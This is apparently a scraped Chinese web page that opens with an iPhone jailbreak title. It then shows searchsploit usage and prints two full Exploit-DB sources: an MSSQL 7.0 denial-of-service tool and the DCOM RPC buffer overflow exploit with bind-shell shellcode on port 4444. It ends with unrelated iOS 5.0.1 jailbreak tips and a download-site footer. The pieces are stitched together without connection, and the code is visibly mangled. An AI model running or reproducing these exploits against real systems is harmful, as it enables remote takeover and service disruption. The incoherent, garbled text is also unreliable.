越狱出现exploit failed，越狱提示exploitfailed

今天小编为大家分享Windows系统下载、Windows系统教程、windows相关应用程序的文章，希望能够帮助到大家！

Searchsploit会通过本地的exploit-db，查找软件漏洞信息

如果要查找 mssql的漏洞，命令如下，会找到所有和mssql相关的漏洞信息，后面还有相关的漏洞描述信息：

要看相关的漏洞描述，如果要看mysql7.0的远程DOS漏洞，把漏洞描述后面的路径用编辑器打开即可：

leafpad/usr/share/exploitdb/platforms/./windows/dos/562.c

文本文件里面的内容为漏洞说明文件和漏洞利用文件：

/* Microsoft mssql 7.0 server is vulnerable to denial of service attack

* By sending a large buffer with specified data an attacker can stop

*"mssqlserver" the error noticed is different according to services'

pack but the result is always

* vulnerable: MSSQL7.0 sp0- sp1- sp2- sp3

* This code is for educational purposes, I am not responsible for your acts

* Greets:sm0g DEADm|x#crack.fr itmaroc and evryone who I forgot*/#include<stdio.h>

void main(int argc, char**argv){

SOCKET s; int i; struct sockaddr_in vulh; char buffer[700000]; for(i=0;i<700000;i+=16)memcpy(buffer+i,"\x10\x00\x00\x10\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc",16); if(argc!=3){

printf(" MSSQL denial of service\n");

printf(" by securma massine\n");

printf("Cet outil a ete cree pour test,je ne suis en aucun cas

responsable des degats que vous pouvez en faire\n");

printf("Syntaxe: MSSQLdos<ip><port>\n");

WSAStartup(0x101,&WinsockData);

s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);

ZeroMemory(&vulh,sizeof(vulh));

vulh.sin_addr.s_addr=resolv(argv[1]);

vulh.sin_port=htons(atoi(argv[2])); if(connect(s,(struct sockaddr*)&vulh,sizeof(vulh))==SOCKET_ERROR){

printf("Impossible de se connecter...le port est en generale 1433...\n");

send(s,buffer,sizeof(buffer),0);

printf("Data envoyes...\n");

printf("\nattendez quelques secondes et verifiez que le serveur ne

u_long resolv(char*host_name){ struct in_addr addr; struct hostent*host_ent; if((addr.s_addr= inet_addr(host_name))==-1){ if(!(host_ent= gethostbyname(host_name))){

printf("Erreur DNS: Impossible de résoudre l'adresse%s

CopyMemory((char*)&addr.s_addr,host_ent->h_addr,host_ent->h_length);

}// milw0rm.com [2004-09-29] View Code

leafpad/usr/share/exploitdb/platforms/./windows/remote/66.c

  DCOM RPC Overflow Discovered by LSD- Exploit Based on Xfocus's Code

  Written by H D Moore<hdm [at] metasploit.com>

 - Usage:./dcom<Target ID><Target IP>

 -      0   Windows 2000 SP0(english)

 -      1   Windows 2000 SP1(english)

 -      2   Windows 2000 SP2(english)

 -      3   Windows 2000 SP3(english)

 -      4   Windows 2000 SP4(english)

 -      5   Windows XP SP0(english)

 -      6   Windows XP SP1(english)

*/#include<stdio.h>#include<stdlib.h>#include<error.h>#include<sys/types.h>#include<sys/socket.h>#include<netinet/in.h>#include<arpa/inet.h>#include<unistd.h>#include<netdb.h>#include<fcntl.h>#include<unistd.h> unsigned char bindstr[]={ 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00, 0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00, 0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00, 0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00, 0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00}; unsigned char request1[]={ 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00}; unsigned char request2[]={ 0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x00,0x5C,0x00,0x5C,0x00}; unsigned char request3[]={ 0x5C,0x00,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00}; unsigned char*targets []=

    {"Windows 2000 SP0(english)","Windows 2000 SP1(english)","Windows 2000 SP2(english)","Windows 2000 SP3(english)","Windows 2000 SP4(english)","Windows XP SP0(english)","Windows XP SP1(english)", NULL}; unsigned long offsets []=

    { 0x77e81674, 0x77e829ec, 0x77e824b5, 0x77e8367a, 0x77f92a9b, 0x77e9afe3, 0x77e626ba,

    }; unsigned char sc[]="\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00""\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00""\x46\x00\x58\x00\x46\x00\x58\x00""\xff\xff\xff\xff"/* return address*/"\xcc\xe0\xfd\x7f"/* primary thread data block*/"\xcc\xe0\xfd\x7f"/* primary thread data block*//* port 4444 bindshell*/"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90""\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90""\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90""\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90""\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90""\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90""\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90""\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90""\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90""\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90""\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff""\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2""\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80""\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09""\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6""\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf""\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad""\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81""\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81""\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80""\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80""\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80""\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80""\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80""\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81""\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6""\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3""\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50""\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4""\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4""\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4""\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f""\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b""\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80""\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89""\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80""\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83""\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83""\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78""\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c""\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b""\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04"; unsigned char request4[]={ 0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00};/* ripped from TESO code*/ void shell(int sock){ int l; char buf[512];

     fd_set  rfds; while(1){

         FD_SET(0,&rfds);

         FD_SET(sock,&rfds);

         select(sock+ 1,&rfds, NULL, NULL, NULL); if(FD_ISSET(0,&rfds)){

             l= read(0, buf, sizeof(buf)); if(l<= 0){ printf("\n- Connection closed by local user\n"); exit(EXIT_FAILURE);

            }

             write(sock, buf, l);

        } if(FD_ISSET(sock,&rfds)){

             l= read(sock, buf, sizeof(buf)); if(l== 0){ printf("\n- Connection closed by remote host.\n"); exit(EXIT_FAILURE);

            } else if(l< 0){ printf("\n- Read failure\n"); exit(EXIT_FAILURE);

            }

             write(1, buf, l);

        }

} int main(int argc, char**argv){ int sock; int len,len1; unsigned int target_id; unsigned long ret; struct sockaddr_in target_ip; unsigned short port= 135; unsigned char buf1[0x1000]; unsigned char buf2[0x1000]; printf("---------------------------------------------------------\n"); printf("- Remote DCOM RPC Buffer Overflow Exploit\n"); printf("- Original code by FlashSky and Benjurry\n"); printf("- Rewritten by HDM<hdm [at] metasploit.com>\n"); if(argc<3)

  { printf("- Usage:%s<Target ID><Target IP>\n", argv[0]); printf("- Targets:\n"); for(len=0; targets[len]!= NULL; len++)

    { printf("-     %d\t%s\n", len, targets[len]); 

    } printf("\n"); exit(1);

  }/* yeah, get over it:)*/ target_id= atoi(argv[1]);

   ret= offsets[target_id]; printf("- Using return address of 0x%.8x\n", ret); memcpy(sc+36,(unsigned char*)&ret, 4);

   target_ip.sin_family= AF_INET;

   target_ip.sin_addr.s_addr= inet_addr(argv[2]);

   target_ip.sin_port= htons(port); if((sock=socket(AF_INET,SOCK_STREAM,0))==-1)

     perror("- Socket"); return(0);

  } if(connect(sock,(struct sockaddr*)⌖_ip, sizeof(target_ip))!= 0)

     perror("- Connect"); return(0);

   len=sizeof(sc); memcpy(buf2,request1,sizeof(request1));

   len1=sizeof(request1);

  *(unsigned long*)(request2)=*(unsigned long*)(request2)+sizeof(sc)/2; 

  *(unsigned long*)(request2+8)=*(unsigned long*)(request2+8)+sizeof(sc)/2; memcpy(buf2+len1,request2,sizeof(request2));

   len1=len1+sizeof(request2); memcpy(buf2+len1,sc,sizeof(sc));

   len1=len1+sizeof(sc); memcpy(buf2+len1,request3,sizeof(request3));

   len1=len1+sizeof(request3); memcpy(buf2+len1,request4,sizeof(request4));

   len1=len1+sizeof(request4);

  *(unsigned long*)(buf2+8)=*(unsigned long*)(buf2+8)+sizeof(sc)-0xc;

  *(unsigned long*)(buf2+0x10)=*(unsigned long*)(buf2+0x10)+sizeof(sc)-0xc; 

  *(unsigned long*)(buf2+0x80)=*(unsigned long*)(buf2+0x80)+sizeof(sc)-0xc;

  *(unsigned long*)(buf2+0x84)=*(unsigned long*)(buf2+0x84)+sizeof(sc)-0xc;

  *(unsigned long*)(buf2+0xb4)=*(unsigned long*)(buf2+0xb4)+sizeof(sc)-0xc;

  *(unsigned long*)(buf2+0xb8)=*(unsigned long*)(buf2+0xb8)+sizeof(sc)-0xc;

  *(unsigned long*)(buf2+0xd0)=*(unsigned long*)(buf2+0xd0)+sizeof(sc)-0xc;

  *(unsigned long*)(buf2+0x18c)=*(unsigned long*)(buf2+0x18c)+sizeof(sc)-0xc; if(send(sock,bindstr,sizeof(bindstr),0)==-1)

       perror("- Send"); return(0);

   len=recv(sock, buf1, 1000, 0); if(send(sock,buf2,len1,0)==-1)

       perror("- Send"); return(0);

   target_ip.sin_family= AF_INET;

   target_ip.sin_addr.s_addr= inet_addr(argv[2]);

   target_ip.sin_port= htons(4444); if((sock=socket(AF_INET,SOCK_STREAM,0))==-1)

     perror("- Socket"); return(0);

  } if(connect(sock,(struct sockaddr*)⌖_ip, sizeof(target_ip))!= 0)

  { printf("- Exploit appeared to have failed.\n"); return(0);

  } printf("- Dropping to System Shell...\n\n");

   shell(sock); return(0);

}// milw0rm.com [2003-07-26] View Code

那个不完美，建议今天试试新工具，今天5.0.1已经被完美越狱，圣诞节已经发出来了，越狱工具在威锋网和CNbeta都有下载地址，建议去威锋网看详细教程。

用红雪进行过不完美越狱的也可以直接覆盖越狱。

具体：访问Cydia，搜索Chronic-Dev Team发布一款插件“Corona 5.0.1 Untether”，安装后就能变成完美越狱。

wwW.Xtw.Com.cN系统网专业的PC、手机系统开发下载平台，HarmonyOS系统、安卓、OS、windows电脑重装系统在线下载安装,操作系统平台技术学习,攻略教程,技术交流。